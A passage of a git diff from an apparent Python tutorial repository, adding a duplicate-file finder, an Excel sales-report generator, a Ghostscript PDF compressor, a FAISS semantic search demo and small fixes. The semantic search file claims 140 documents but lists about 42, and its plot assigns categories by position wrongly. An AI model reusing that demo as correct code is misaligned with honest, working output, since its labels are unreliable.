+    table = Table(title="Duplicate Files Found", show_lines=True)
+    table.add_column("Group", style="cyan", width=6)
+    table.add_column("File Path", style="white")
+    table.add_column("Size", style="yellow", width=12)
+    table.add_column("Status", width=10)
+
+    for i, (file_hash, files) in enumerate(duplicates, 1):
+        file_size = format_size(files[0].stat().st_size)
+        for j, fpath in enumerate(files):
+            rel_path = str(fpath.relative_to(root_dir))
+            status = "[green]KEEP[/green]" if j == 0 else "[red]DUPLICATE[/red]"
+            table.add_row(
+                str(i) if j == 0 else "",
+                rel_path,
+                file_size if j == 0 else "",
+                status
+            )
+
+    console.print(table)
+
+    # Recommendation
+    console.print(Panel(
+        f"[yellow]To reclaim [bold]{format_size(wasted_bytes)}[/bold], review the "
+        f"[red]DUPLICATE[/red] files above and delete the copies you don't need. "
+        f"Keep one copy in each group ([green]KEEP[/green]).[/yellow]",
+        title="Recommendation",
+        border_style="yellow"
+    ))
+
+# ═══════════════════════════════════════════════════════════════
+# TEST SETUP (for demonstration)
+# ═══════════════════════════════════════════════════════════════
+
+def setup_test_files(base_dir: str = "test_files"):
+    """Create a directory structure with deliberate duplicates for testing."""
+    if Path(base_dir).exists():
+        shutil.rmtree(base_dir)
+    Path(base_dir).mkdir(exist_ok=True)
+
+    dirs = ["photos", "documents", "downloads", "photos/vacation", "documents/old"]
+    for d in dirs:
+        Path(base_dir, d).mkdir(parents=True, exist_ok=True)
+
+    random.seed(42)
+
+    file_records = []
+    for i in range(30):
+        size = random.choice([1024, 5120, 10240, 51200, 102400])
+        content = os.urandom(size)
+        folder = random.choice(dirs)
+        ext = random.choice([".txt", ".jpg", ".png", ".pdf", ".docx", ".csv"])
+        name = f"file_{i:03d}{ext}"
+        file_records.append((folder, name, content))
+
+    # Plant duplicates (same content, different names/locations)
+    duplicate_plan = [
+        (0, "photos/vacation", "beach_photo.jpg"),
+        (0, "downloads", "temp_image.jpg"),        # triplicate!
+        (5, "documents/old", "old_report.pdf"),
+        (10, "downloads", "budget_backup.csv"),
+        (15, "photos", "profile_pic_copy.png"),
+        (20, "documents/old", "archived_notes.docx"),
+    ]
+
+    for orig_idx, dup_folder, dup_name in duplicate_plan:
+        folder, name, content = file_records[orig_idx]
+        Path(base_dir, dup_folder).mkdir(parents=True, exist_ok=True)
+        Path(base_dir, dup_folder, dup_name).write_bytes(content)
+
+    for folder, name, content in file_records:
+        Path(base_dir, folder, name).write_bytes(content)
+
+    return base_dir
+
+# ═══════════════════════════════════════════════════════════════
+# MAIN
+# ═══════════════════════════════════════════════════════════════
+
+def main():
+    """Main entry point."""
+
+    # Accept a directory path from the command line, or use test files
+    if len(sys.argv) > 1:
+        target_dir = sys.argv[1]
+        console.print(f"[bold]Scanning [cyan]{target_dir}[/cyan] for duplicates...[/bold]\n")
+    else:
+        console.print("[bold]Setting up test files...[/bold]")
+        target_dir = setup_test_files("test_files")
+        console.print("[bold]Scanning for duplicates...[/bold]\n")
+
+    hash_map, total_files, total_size = scan_directory(Path(target_dir))
+    duplicates = find_duplicates(hash_map)
+    display_results(duplicates, total_files, total_size, Path(target_dir))
+
+
+if __name__ == "__main__":
+    main()
diff --git a/general/interactive-weather-plot/interactive_weather_plot.py b/general/interactive-weather-plot/interactive_weather_plot.py
index b4d17141..3d1ea566 100644
--- a/general/interactive-weather-plot/interactive_weather_plot.py
+++ b/general/interactive-weather-plot/interactive_weather_plot.py
@@ -68,7 +68,7 @@ def changeLocation(newLocation):
 # Making the Radio Buttons
 buttons = RadioButtons(
     ax=plt.axes([0.1, 0.1, 0.2, 0.2]),
-    labels=locations.keys()
+    labels=list(locations.keys())
 )
 
 # Connect click event on the buttons to the function that changes location.
@@ -86,4 +86,4 @@ def changeLocation(newLocation):
 
 plt.savefig('file.svg', format='svg')
 
-plt.show()
\ No newline at end of file
+plt.show()
diff --git a/general/sales-report-generator/sales_report_generator.py b/general/sales-report-generator/sales_report_generator.py
new file mode 100644
index 00000000..eea6c278
--- /dev/null
+++ b/general/sales-report-generator/sales_report_generator.py
@@ -0,0 +1,283 @@
+"""
+Automated Sales Report Generator
+Produces a 4-sheet professional Excel report from raw sales data.
+
+Usage:
+    python sales_report_generator.py
+    → generates Sales_Report_Q1_2025.xlsx
+
+Requirements:
+    pip install openpyxl
+"""
+from openpyxl import Workbook
+from openpyxl.styles import Font, PatternFill, Alignment, Border, Side
+from openpyxl.chart import BarChart, PieChart, Reference
+from openpyxl.chart.label import DataLabelList
+from openpyxl.chart.series import DataPoint
+from openpyxl.utils import get_column_letter
+from openpyxl.formatting.rule import DataBarRule, ColorScaleRule
+from collections import defaultdict
+
+# ============================================================
+# CONFIGURATION — swap this with your own data source
+# ============================================================
+SALES_DATA = [
+    # Product, Category, Region, Units, Price, Cost
+    ["Wireless Mouse", "Accessories", "North", 145, 24.99, 12.50],
+    ["Mechanical Keyboard", "Accessories", "North", 98, 89.99, 45.00],
+    ["USB-C Hub", "Accessories", "South", 210, 34.50, 17.25],
+    ["27\" Monitor", "Displays", "East", 45, 299.99, 180.00],
+    ["24\" Monitor", "Displays", "West", 67, 189.99, 110.00],
+    ["Webcam 1080p", "Peripherals", "North", 167, 54.99, 27.50],
+    ["Laptop Stand", "Accessories", "South", 320, 39.99, 15.00],
+    ["Desk Lamp LED", "Office", "East", 275, 29.99, 10.00],
+    ["Standing Desk", "Office", "West", 22, 499.99, 250.00],
+    ["Noise Canceling Phones", "Audio", "North", 89, 149.99, 75.00],
+    ["Bluetooth Speaker", "Audio", "South", 134, 79.99, 40.00],
+    ["HDMI Cable 6ft", "Accessories", "East", 450, 12.99, 4.00],
+    ["Wireless Charger", "Accessories", "West", 189, 19.99, 8.00],
+    ["Ergonomic Chair", "Office", "North", 15, 899.99, 450.00],
+]
+
+# ============================================================
+# STYLES
+# ============================================================
+DARK_BLUE, MED_BLUE, LIGHT_BLUE = "1F4E79", "2E75B6", "D6E4F0"
+GREEN_HEADER, LIGHT_GREEN, WHITE = "375623", "E2EFDA", "FFFFFF"
+
+hdr_fill = PatternFill(start_color=DARK_BLUE, end_color=DARK_BLUE, fill_type="solid")
+hdr_font = Font(name="Calibri", size=11, bold=True, color=WHITE)
+hdr_align = Alignment(horizontal="center", vertical="center", wrap_text=True)
+thin_border = Border(left=Side(style="thin"), right=Side(style="thin"),
+                     top=Side(style="thin"), bottom=Side(style="thin"))
+alt_fill = PatternFill(start_color=LIGHT_BLUE, end_color=LIGHT_BLUE, fill_type="solid")
+curr_fmt, num_fmt, pct_fmt = '$#,##0.00', '#,##0', '0.0%'
+
+# ============================================================
+# BUILD WORKBOOK
+# ============================================================
+wb = Workbook()
+
+# ----- SHEET 1: Detailed Sales Data -----
+ws = wb.active
+ws.title = "Sales Data"
+
+headers = ["Product", "Category", "Region", "Units Sold",
+           "Unit Price", "Unit Cost", "Revenue", "Profit", "Margin %"]
+for c, h in enumerate(headers, 1):
+    cell = ws.cell(row=1, column=c, value=h)
+    cell.fill, cell.font, cell.alignment, cell.border = hdr_fill, hdr_font, hdr_align, thin_border
+
+for r, row in enumerate(SALES_DATA, 2):
+    for c, val in enumerate(row, 1):
+        cell = ws.cell(row=r, column=c, value=val)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if c >= 4:
+            cell.alignment = Alignment(horizontal="right")
+        if r % 2 == 0:
+            cell.fill = alt_fill
+
+    # Formulas
+    ws.cell(row=r, column=7, value=f"=D{r}*E{r}")
+    ws.cell(row=r, column=8, value=f"=G{r}-(D{r}*F{r})")
+    ws.cell(row=r, column=9, value=f"=H{r}/G{r}")
+    ws.cell(row=r, column=5).number_format = curr_fmt
+    ws.cell(row=r, column=6).number_format = curr_fmt
+    ws.cell(row=r, column=7).number_format = curr_fmt
+    ws.cell(row=r, column=8).number_format = curr_fmt
+    ws.cell(row=r, column=9).number_format = pct_fmt
+
+# Totals row
+tr = len(SALES_DATA) + 2
+ws.merge_cells(f"A{tr}:C{tr}")
+tc = ws.cell(row=tr, column=1, value="TOTALS")
+tc.font = Font(name="Calibri", size=11, bold=True, color=DARK_BLUE)
+tc.alignment = Alignment(horizontal="right")
+tc.fill = PatternFill(start_color=LIGHT_GREEN, end_color=LIGHT_GREEN, fill_type="solid")
+for col in [4, 7, 8]:
+    cell = ws.cell(row=tr, column=col)
+    cell.value = f"=SUM({get_column_letter(col)}2:{get_column_letter(col)}{tr - 1})"
+    cell.font = Font(name="Calibri", size=11, bold=True)
+    cell.fill = PatternFill(start_color=LIGHT_GREEN, end_color=LIGHT_GREEN, fill_type="solid")
+    cell.border = thin_border
+    cell.number_format = curr_fmt if col >= 7 else num_fmt
+
+# Conditional formatting + freeze + auto-filter
+ws.conditional_formatting.add(
+    f"I2:I{tr - 1}",
+    ColorScaleRule(start_type="num", start_value=0, start_color="F8696B",
+                   mid_type="percentile", mid_value=50, mid_color="FFEB84",
+                   end_type="num", end_value=0.6, end_color="63BE7B"))
+ws.conditional_formatting.add(
+    f"D2:D{tr - 1}",
+    DataBarRule(start_type="min", end_type="max", color=MED_BLUE, showValue=True))
+ws.freeze_panes = "A2"
+ws.auto_filter.ref = f"A1:I{tr - 1}"
+
+# Column widths
+for i, w in enumerate([26, 16, 10, 12, 14, 14, 14, 14, 12], 1):
+    ws.column_dimensions[get_column_letter(i)].width = w
+
+# ----- SHEET 2: Category Summary -----
+ws_cat = wb.create_sheet("Category Summary")
+
+# Aggregate by category
+cat_data = defaultdict(lambda: {"units": 0, "revenue": 0.0, "profit": 0.0})
+for row in SALES_DATA:
+    cat, units, price, cost = row[1], row[3], row[4], row[5]
+    rev = units * price
+    cat_data[cat]["units"] += units
+    cat_data[cat]["revenue"] += rev
+    cat_data[cat]["profit"] += rev - (units * cost)
+
+sorted_cats = sorted(cat_data.items(), key=lambda x: x[1]["revenue"], reverse=True)
+
+for c, h in enumerate(["Category", "Total Units", "Total Revenue", "Total Profit", "Margin %"], 1):
+    cell = ws_cat.cell(row=1, column=c, value=h)
+    cell.fill = PatternFill(start_color=GREEN_HEADER, end_color=GREEN_HEADER, fill_type="solid")
+    cell.font = Font(name="Calibri", size=11, bold=True, color=WHITE)
+    cell.alignment, cell.border = hdr_align, thin_border
+
+for r, (cat, vals) in enumerate(sorted_cats, 2):
+    ws_cat.cell(row=r, column=1, value=cat)
+    ws_cat.cell(row=r, column=2, value=vals["units"])
+    ws_cat.cell(row=r, column=3, value=round(vals["revenue"], 2))
+    ws_cat.cell(row=r, column=4, value=round(vals["profit"], 2))
+    ws_cat.cell(row=r, column=5, value=f"=D{r}/C{r}")
+    for c in range(1, 6):
+        cell = ws_cat.cell(row=r, column=c)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if c >= 2:
+            cell.alignment = Alignment(horizontal="right")
+        if r % 2 == 0:
+            cell.fill = alt_fill
+    ws_cat.cell(row=r, column=3).number_format = curr_fmt
+    ws_cat.cell(row=r, column=4).number_format = curr_fmt
+    ws_cat.cell(row=r, column=5).number_format = pct_fmt
+
+# Bar chart
+bar = BarChart()
+bar.type = "col"
+bar.style = 10
+bar.title = "Revenue by Product Category"
+bar.width, bar.height = 22, 14
+bar.add_data(Reference(ws_cat, min_col=3, min_row=1, max_row=len(sorted_cats) + 1),
+             titles_from_data=True)
+bar.set_categories(Reference(ws_cat, min_col=1, min_row=2, max_row=len(sorted_cats) + 1))
+chart_colors = ["2E75B6", "ED7D31", "A5A5A5", "FFC000", "4472C4", "70AD47"]
+for i in range(len(sorted_cats)):
+    pt = DataPoint(idx=i)
+    pt.graphicalProperties.solidFill = chart_colors[i % 6]
+    bar.series[0].data_points.append(pt)
+ws_cat.add_chart(bar, "G2")
+ws_cat.conditional_formatting.add(
+    f"C2:C{len(sorted_cats) + 1}",
+    DataBarRule(start_type="min", end_type="max", color=MED_BLUE, showValue=True))
+for i, w in enumerate([20, 14, 18, 16, 12], 1):
+    ws_cat.column_dimensions[get_column_letter(i)].width = w
+
+# ----- SHEET 3: Regional Breakdown -----
+ws_reg = wb.create_sheet("Regional Breakdown")
+reg_data = defaultdict(lambda: {"units": 0, "revenue": 0.0})
+for row in SALES_DATA:
+    reg = row[2]
+    units = row[3]
+    rev = units * row[4]
+    reg_data[reg]["units"] += units
+    reg_data[reg]["revenue"] += rev
+
+for c, h in enumerate(["Region", "Units Sold", "Revenue"], 1):
+    cell = ws_reg.cell(row=1, column=c, value=h)
+    cell.fill, cell.font, cell.alignment, cell.border = hdr_fill, hdr_font, hdr_align, thin_border
+
+for r, (reg, vals) in enumerate(sorted(reg_data.items()), 2):
+    ws_reg.cell(row=r, column=1, value=reg)
+    ws_reg.cell(row=r, column=2, value=vals["units"])
+    ws_reg.cell(row=r, column=3, value=round(vals["revenue"], 2))
+    for c in range(1, 4):
+        cell = ws_reg.cell(row=r, column=c)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if c >= 2:
+            cell.alignment = Alignment(horizontal="right")
+    ws_reg.cell(row=r, column=3).number_format = curr_fmt
+
+# Pie chart
+pie = PieChart()
+pie.title = "Revenue Share by Region"
+pie.width, pie.height = 18, 14
+pie.add_data(Reference(ws_reg, min_col=3, min_row=1, max_row=len(reg_data) + 1),
+             titles_from_data=True)
+pie.set_categories(Reference(ws_reg, min_col=1, min_row=2, max_row=len(reg_data) + 1))
+pie.dataLabels = DataLabelList()
+pie.dataLabels.showPercent = True
+pie.dataLabels.showCatName = True
+for i in range(len(reg_data)):
+    pt = DataPoint(idx=i)
+    pt.graphicalProperties.solidFill = chart_colors[i % 6]
+    pie.series[0].data_points.append(pt)
+ws_reg.add_chart(pie, "E2")
+for c, w in [('A', 14), ('B', 14), ('C', 14)]:
+    ws_reg.column_dimensions[c].width = w
+
+# ----- SHEET 4: Executive Dashboard -----
+ws_exec = wb.create_sheet("Executive Dashboard")
+ws_exec.merge_cells("A1:F1")
+title = ws_exec.cell(row=1, column=1, value="SALES PERFORMANCE DASHBOARD — Q1 2025")
+title.font = Font(name="Calibri", size=16, bold=True, color=DARK_BLUE)
+title.alignment = Alignment(horizontal="center", vertical="center")
+ws_exec.row_dimensions[1].height = 35
+
+total_revenue = sum(r[3] * r[4] for r in SALES_DATA)
+total_units = sum(r[3] for r in SALES_DATA)
+total_profit = sum((r[3] * r[4]) - (r[3] * r[5]) for r in SALES_DATA)
+avg_margin = total_profit / total_revenue if total_revenue else 0
+
+kpis = [("TOTAL REVENUE", f"${total_revenue:,.0f}", 1),
+        ("TOTAL UNITS SOLD", f"{total_units:,}", 2),
+        ("TOTAL PROFIT", f"${total_profit:,.0f}", 3),
+        ("AVG MARGIN", f"{avg_margin:.1%}", 4)]
+for kpi_title, kpi_val, col in kpis:
+    for r_offset, (val, font) in enumerate(
+        [(kpi_title, Font(size=10, bold=True, color=WHITE)),
+         (kpi_val, Font(size=22, bold=True, color=WHITE))]):
+        cell = ws_exec.cell(row=3 + r_offset, column=col, value=val)
+        cell.font = font
+        cell.fill = PatternFill(start_color=MED_BLUE, end_color=MED_BLUE, fill_type="solid")
+        cell.alignment = Alignment(horizontal="center")
+    ws_exec.column_dimensions[get_column_letter(col)].width = 22
+ws_exec.row_dimensions[4].height = 40
+
+# Summary table on dashboard
+ws_exec.merge_cells("A6:D6")
+ws_exec.cell(row=6, column=1, value="Key Metrics by Category").font = Font(
+    size=12, bold=True, color=DARK_BLUE)
+for c, h in enumerate(["Category", "Units", "Revenue", "Profit"], 1):
+    cell = ws_exec.cell(row=7, column=c, value=h)
+    cell.fill, cell.font, cell.alignment, cell.border = hdr_fill, hdr_font, hdr_align, thin_border
+for r, (cat, vals) in enumerate(sorted_cats, 8):
+    ws_exec.cell(row=r, column=1, value=cat)
+    ws_exec.cell(row=r, column=2, value=vals["units"])
+    ws_exec.cell(row=r, column=3, value=round(vals["revenue"], 2))
+    ws_exec.cell(row=r, column=4, value=round(vals["profit"], 2))
+    for c in range(1, 5):
+        cell = ws_exec.cell(row=r, column=c)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if r % 2 == 0:
+            cell.fill = alt_fill
+    ws_exec.cell(row=r, column=3).number_format = curr_fmt
+    ws_exec.cell(row=r, column=4).number_format = curr_fmt
+
+# ============================================================
+# SAVE
+# ============================================================
+output_path = "Sales_Report_Q1_2025.xlsx"
+wb.save(output_path)
+print(f"✅ Report generated: {output_path}")
+print(f"   Sheets: {wb.sheetnames}")
+print(f"   Total Revenue: ${total_revenue:,.2f}")
+print(f"   Total Profit: ${total_profit:,.2f}")
+print(f"   Avg Margin: {avg_margin:.1%}")
diff --git a/gui-programming/rich-text-editor/rich_text_editor.py b/gui-programming/rich-text-editor/rich_text_editor.py
index 10c14263..05259905 100644
--- a/gui-programming/rich-text-editor/rich_text_editor.py
+++ b/gui-programming/rich-text-editor/rich_text_editor.py
@@ -112,9 +112,9 @@ def fileManager(event=None, action=None):
             document['tags'][tagName] = []
 
             ranges = textArea.tag_ranges(tagName)
-
-            for i, tagRange in enumerate(ranges[::2]):
-                document['tags'][tagName].append([str(tagRange), str(ranges[i+1])])
+	
+            for i in range(0, len(ranges), 2):
+                document['tags'][tagName].append([str(ranges[i]), str(ranges[i + 1])])
 
         if not filePath:
             # ask the user for a filename with the native file explorer.
diff --git a/handling-pdf-files/pdf-compressor/README.md b/handling-pdf-files/pdf-compressor/README.md
index 4527174c..307f105c 100644
--- a/handling-pdf-files/pdf-compressor/README.md
+++ b/handling-pdf-files/pdf-compressor/README.md
@@ -1,8 +1,48 @@
 # [How to Compress PDF Files in Python](https://www.thepythoncode.com/article/compress-pdf-files-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- To compress `bert-paper.pdf` file:
-    ```
-    $ python pdf_compressor.py bert-paper.pdf bert-paper-min.pdf
-    ```
-    This will spawn a new compressed PDF file under the name `bert-paper-min.pdf`.
+
+This directory contains two approaches:
+
+- Legacy (commercial): `pdf_compressor.py` uses PDFTron/PDFNet. PDFNet now requires a license key and the old pip package is not freely available, so this may not work without a license.
+- Recommended (open source): `pdf_compressor_ghostscript.py` uses Ghostscript to compress PDFs.
+
+## Ghostscript method (recommended)
+
+Prerequisite: Install Ghostscript
+
+- macOS (Homebrew):
+  - `brew install ghostscript`
+- Ubuntu/Debian:
+  - `sudo apt-get update && sudo apt-get install -y ghostscript`
+- Windows:
+  - Download and install from https://ghostscript.com/releases/
+  - Ensure `gswin64c.exe` (or `gswin32c.exe`) is in your PATH.
+
+No Python packages are required for this method, only Ghostscript.
+
+### Usage
+
+To compress `bert-paper.pdf` into `bert-paper-min.pdf` with default quality (`power=2`):
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf
+```
+
+Optional quality level `[power]` controls compression/quality tradeoff (maps to Ghostscript `-dPDFSETTINGS`):
+
+- 0 = `/screen` (smallest, lowest quality)
+- 1 = `/ebook` (good quality)
+- 2 = `/printer` (high quality) [default]
+- 3 = `/prepress` (very high quality)
+- 4 = `/default` (Ghostscript default)
+
+Example:
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf 1
+```
+
+In testing, `bert-paper.pdf` (~757 KB) compressed to ~407 KB with `power=1`.
+
+## Legacy PDFNet method (requires license)
+
+If you have a valid license and the PDFNet SDK installed, you can use the original `pdf_compressor.py` script. Note that the previously referenced `PDFNetPython3` pip package is not freely available and may not install via pip. Refer to the vendor's documentation for installation and licensing.
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
new file mode 100644
index 00000000..88de4062
--- /dev/null
+++ b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
@@ -0,0 +1,103 @@
+import os
+import sys
+import subprocess
+import shutil
+
+
+def get_size_format(b, factor=1024, suffix="B"):
+    for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
+        if b < factor:
+            return f"{b:.2f}{unit}{suffix}"
+        b /= factor
+    return f"{b:.2f}Y{suffix}"
+
+
+def find_ghostscript_executable():
+    candidates = [
+        shutil.which('gs'),
+        shutil.which('gswin64c'),
+        shutil.which('gswin32c'),
+    ]
+    for c in candidates:
+        if c:
+            return c
+    return None
+
+
+def compress_file(input_file: str, output_file: str, power: int = 2):
+    """Compress PDF using Ghostscript.
+
+    power:
+        0 -> /screen (lowest quality, highest compression)
+        1 -> /ebook (good quality)
+        2 -> /printer (high quality) [default]
+        3 -> /prepress (very high quality)
+        4 -> /default (Ghostscript default)
+    """
+    if not os.path.exists(input_file):
+        raise FileNotFoundError(f"Input file not found: {input_file}")
+    if not output_file:
+        output_file = input_file
+
+    initial_size = os.path.getsize(input_file)
+
+    gs = find_ghostscript_executable()
+    if not gs:
+        raise RuntimeError(
+            "Ghostscript not found. Install it and ensure 'gs' (Linux/macOS) "
+            "or 'gswin64c'/'gswin32c' (Windows) is in PATH."
+        )
+
+    settings_map = {
+        0: '/screen',
+        1: '/ebook',
+        2: '/printer',
+        3: '/prepress',
+        4: '/default',
+    }
+    pdfsettings = settings_map.get(power, '/printer')
+
+    cmd = [
+        gs,
+        '-sDEVICE=pdfwrite',
+        '-dCompatibilityLevel=1.4',
+        f'-dPDFSETTINGS={pdfsettings}',
+        '-dNOPAUSE',
+        '-dBATCH',
+        '-dQUIET',
+        f'-sOutputFile={output_file}',
+        input_file,
+    ]
+
+    try:
+        subprocess.run(cmd, check=True)
+    except subprocess.CalledProcessError as e:
+        print(f"Ghostscript failed: {e}")
+        return False
+
+    compressed_size = os.path.getsize(output_file)
+    ratio = 1 - (compressed_size / initial_size)
+    summary = {
+        "Input File": input_file,
+        "Initial Size": get_size_format(initial_size),
+        "Output File": output_file,
+        "Compressed Size": get_size_format(compressed_size),
+        "Compression Ratio": f"{ratio:.3%}",
+    }
+
+    print("## Summary ########################################################")
+    for k, v in summary.items():
+        print(f"{k}: {v}")
+    print("###################################################################")
+    return True
+
+
+if __name__ == '__main__':
+    if len(sys.argv) < 3:
+        print("Usage: python pdf_compressor_ghostscript.py <input.pdf> <output.pdf> [power 0-4]")
+        sys.exit(1)
+    input_file = sys.argv[1]
+    output_file = sys.argv[2]
+    power = int(sys.argv[3]) if len(sys.argv) > 3 else 2
+    ok = compress_file(input_file, output_file, power)
+    sys.exit(0 if ok else 2)
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/requirements.txt b/handling-pdf-files/pdf-compressor/requirements.txt
index 0a664a86..9f6e5337 100644
--- a/handling-pdf-files/pdf-compressor/requirements.txt
+++ b/handling-pdf-files/pdf-compressor/requirements.txt
@@ -1 +1,7 @@
-PDFNetPython3==8.1.0
\ No newline at end of file
+# No Python dependencies required for Ghostscript-based compressor.
+# System dependency: Ghostscript
+# - macOS:   brew install ghostscript
+# - Debian:  sudo apt-get install -y ghostscript
+# - Windows: https://ghostscript.com/releases/
+#
+# The legacy script (pdf_compressor.py) depends on PDFNet (commercial) and a license key.
\ No newline at end of file
diff --git a/images/codingfleet-banner-2.png b/images/codingfleet-banner-2.png
new file mode 100644
index 00000000..e95c4d27
Binary files /dev/null and b/images/codingfleet-banner-2.png differ
diff --git a/images/codingfleet-banner-3.png b/images/codingfleet-banner-3.png
new file mode 100644
index 00000000..9f27495e
Binary files /dev/null and b/images/codingfleet-banner-3.png differ
diff --git a/images/iproyal-1.png b/images/iproyal-1.png
new file mode 100644
index 00000000..9e607e13
Binary files /dev/null and b/images/iproyal-1.png differ
diff --git a/machine-learning/semantic-search-faiss/semantic_search.py b/machine-learning/semantic-search-faiss/semantic_search.py
new file mode 100644
index 00000000..e2ec4d9b
--- /dev/null
+++ b/machine-learning/semantic-search-faiss/semantic_search.py
@@ -0,0 +1,118 @@
+"""
+Semantic Search Engine with FAISS + Sentence Transformers
+=========================================================
+Builds a fully local semantic search engine.
+Requirements: pip install sentence-transformers faiss-cpu numpy rich matplotlib scikit-learn
+"""
+import numpy as np
+from sentence_transformers import SentenceTransformer
+import faiss
+from rich.console import Console
+from rich.table import Table
+from rich.panel import Panel
+from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn
+import time
+import matplotlib
+matplotlib.use('Agg')
+import matplotlib.pyplot as plt
+from sklearn.decomposition import PCA
+
+console = Console()
+
+# 140 documents across 7 categories: Tech, Science, Cooking, Travel, Health, Business, Arts
+documents = [
+    "Python is a high-level programming language known for its readability and simplicity",
+    "Docker containers package applications with their dependencies for consistent deployment",
+    "REST APIs use HTTP methods like GET, POST, PUT, and DELETE to interact with web resources",
+    "Photosynthesis is the process by which plants convert sunlight into chemical energy",
+    "Black holes are regions of spacetime where gravity is so strong that nothing can escape",
+    "Plate tectonics explains how Earth's crust moves, causing earthquakes and volcanic activity",
+    "Pasta carbonara is an Italian dish made with eggs, cheese, pancetta, and black pepper",
+    "Sourdough bread uses naturally occurring wild yeast and bacteria for fermentation",
+    "The Maillard reaction creates brown crusts and complex flavors when proteins are heated",
+    "The Great Wall of China stretches over 13,000 miles across northern China",
+    "Tokyo is the most populous metropolitan area in the world with over 37 million residents",
+    "Bali is an Indonesian island known for its terraced rice paddies and Hindu temples",
+    "Regular cardiovascular exercise strengthens the heart and improves blood circulation",
+    "A balanced diet includes fruits, vegetables, whole grains, lean proteins, and healthy fats",
+    "Meditation reduces stress by helping practitioners focus on the present moment",
+    "Compound interest allows investments to grow exponentially over long periods of time",
+    "Diversification spreads investment risk across different asset classes and sectors",
+    "A budget helps individuals and businesses track income and expenses to meet financial goals",
+    "The Renaissance was a period of great artistic and intellectual achievement in Europe",
+    "Digital art uses computer technology as an essential part of the creative process",
+    "Abstract art uses shapes, colors, and forms to achieve its effect rather than realistic depiction",
+    "Git is a distributed version control system that tracks changes in source code",
+    "Kubernetes orchestrates containerized applications across clusters of machines",
+    "Neural networks are computing systems inspired by biological neurons in the human brain",
+    "DNA molecules contain the genetic instructions for the development of all living organisms",
+    "Evolution by natural selection explains how species adapt to their environments over time",
+    "Climate change refers to long-term shifts in global temperatures and weather patterns",
+    "Sushi is a Japanese dish of vinegared rice combined with raw fish and vegetables",
+    "Chocolate chip cookies should be baked until the edges are golden but the center is soft",
+    "Baking requires precise measurements because it involves complex chemical reactions",
+    "Machu Picchu is a 15th-century Inca citadel located high in the Andes Mountains in Peru",
+    "The Northern Lights are caused by solar particles interacting with Earth's magnetic field",
+    "Iceland has over 130 volcanoes and numerous geothermal hot springs used for bathing",
+    "Yoga combines physical postures, breathing techniques, and meditation for overall wellness",
+    "Getting seven to nine hours of quality sleep each night is essential for cognitive function",
+    "Strength training builds muscle mass and increases bone density, reducing injury risk",
+    "The stock market enables companies to raise capital by selling shares to public investors",
+    "Cryptocurrencies use cryptographic techniques to enable secure decentralized transactions",
+    "Venture capital firms invest in early-stage companies with high growth potential",
+    "Impressionist painters like Monet used loose brushstrokes to capture the effects of light",
+    "Jazz music originated in African American communities in New Orleans in the early 1900s",
+    "Hip hop culture emerged in the Bronx during the 1970s and includes rap, DJing, and breakdancing",
+]
+
+# Generate embeddings
+model = SentenceTransformer("all-MiniLM-L6-v2")
+embeddings = model.encode(documents, convert_to_numpy=True, normalize_embeddings=True)
+
+# Build FAISS index
+dimension = embeddings.shape[1]
+index = faiss.IndexFlatIP(dimension)
+index.add(embeddings.astype(np.float32))
+
+def semantic_search(query: str, top_k: int = 5):
+    """Search for documents semantically similar to the query."""
+    query_embedding = model.encode([query], convert_to_numpy=True, normalize_embeddings=True).astype(np.float32)
+    scores, indices = index.search(query_embedding, top_k)
+    results = []
+    for score, idx in zip(scores[0], indices[0]):
+        results.append({"score": float(score), "similarity_pct": f"{score * 100:.1f}%", "document": documents[idx]})
+    return results
+
+# Demo
+console.print(Panel("[bold cyan]Semantic Search Demo[/bold cyan]", border_style="blue"))
+queries = [
+    "How do I make pasta at home?",
+    "What causes earthquakes and volcanic eruptions?",
+    "Tell me about investing and saving money",
+    "Best places to visit in Asia",
+    "How to stay healthy and fit",
+    "I want to learn web development",
+    "What is the theory of evolution?",
+]
+
+for query in queries:
+    results = semantic_search(query, top_k=3)
+    console.print(f"\n[bold]Query:[/bold] [cyan]{query}[/cyan]")
+    for i, r in enumerate(results, 1):
+        console.print(f"  {i}. ({r['similarity_pct']}) {r['document'][:80]}")
+
+# Visualize with PCA
+pca = PCA(n_components=2, random_state=42)
+embeddings_2d = pca.fit_transform(embeddings)
+categories = ["Tech", "Science", "Cooking", "Travel", "Health", "Business", "Arts"]
+colors = ["#3b82f6", "#10b981", "#f59e0b", "#8b5cf6", "#ef4444", "#06b6d4", "#ec4899"]
+fig, ax = plt.subplots(figsize=(14, 10))
+docs_per_cat = len(documents) // len(categories)
+for i, cat in enumerate(categories):
+    mask = [j // docs_per_cat == i for j in range(len(documents))]
+    ax.scatter(embeddings_2d[mask, 0], embeddings_2d[mask, 1], c=colors[i], label=cat, alpha=0.7, s=50, edgecolors='white', linewidth=0.5)
+ax.set_title("Document Embeddings Visualized with PCA\n384-dimensional vectors -> 2D projection", fontsize=14, fontweight='bold')
+ax.legend(loc='upper right')
+plt.tight_layout()
+plt.savefig('embedding_visualization.png', dpi=150)
+console.print("[green]Visualization saved![/green]")
diff --git a/machine-learning/speech-recognition/README.md b/machine-learning/speech-recognition/README.md
index 0fa9d3a6..316c18db 100644
--- a/machine-learning/speech-recognition/README.md
+++ b/machine-learning/speech-recognition/README.md
@@ -1,16 +1,70 @@
 # [How to Convert Speech to Text in Python](https://www.thepythoncode.com/article/using-speech-recognition-to-convert-speech-to-text-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- To recognize the text of an audio file named `16-122828-0002.wav`:
-    ```
-    python recognizer.py 16-122828-0002.wav
-    ```
-    **Output**:
-    ```
-    I believe you're just talking nonsense
-    ```
-- To recognize the text from your microphone after talking 5 seconds:
-    ```
-    python live_recognizer.py 5
-    ```
